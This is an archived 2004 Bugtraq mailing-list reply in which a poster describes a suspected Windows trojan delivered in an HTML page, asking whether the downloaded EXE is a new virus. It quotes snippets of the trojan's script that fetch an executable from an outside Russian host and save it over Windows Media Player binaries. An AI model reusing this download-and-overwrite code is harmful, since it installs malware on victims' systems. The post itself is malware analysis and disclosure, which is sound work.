[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.BSF.4.58.0401291545550.39640@erfrnepu.fhfcvpvbhf.bet>
Date: Thu, 29 Jan 2004 16:12:38 -0500 (EST)
From: Atom 'Smasher' <atom@...picious.org>
To: bugtraq@...urityfocus.com
Subject: Re: new WIN virus?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
in response to replies i've received on and off list...
no: i'm not infected (i live in an M$-free home).
no: i didn't submit the [suspected] virus to anyplace other than what i
originally listed.
yes: the HTML file is a trojan. it's purpose is to covertly download the
EXE file, and replace media-players with it. the EXE file is likely up to
no-good, and that's the file that i tested for being a virus. a quick look
at the HTML file reveals that it's intent is evil. i don't have a good way
to check what the EXE file wants to do, but i assume that it's evil.
summary: i'm assuming that if the HTML page wants to covertly do this:
## snip
x.Open("GET", "http://www.alextour.ru/dan/updatte.exe",0);
## snip
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2);
## snip
then the EXE file is probably something that's not supposed to be a media
player, and should probably be recognized as a virus. the fact that it
isn't recognized as a virus makes me wonder if it's new.
...atom
_______________________________________________
PGP key - http://smasher.suspicious.org/pgp.txt
3EBE 2810 30AE 601D 54B2 4A90 9C28 0BBF 3D7D 41E3
-------------------------------------------------
"Simply stated, there is no doubt that Saddam Hussein now
has weapons of mass destruction."
-- Dick Cheney, 26 August 2002
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)
iD8DBQFAGXdLnCgLvz19QeMRAsWZAJ9o3yW0LiVlRWQ6+HvT9ctwqhPR7ACfWCfz
9ziAQPp5TEfznV6wQ7s+qOY=
=5sDs
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists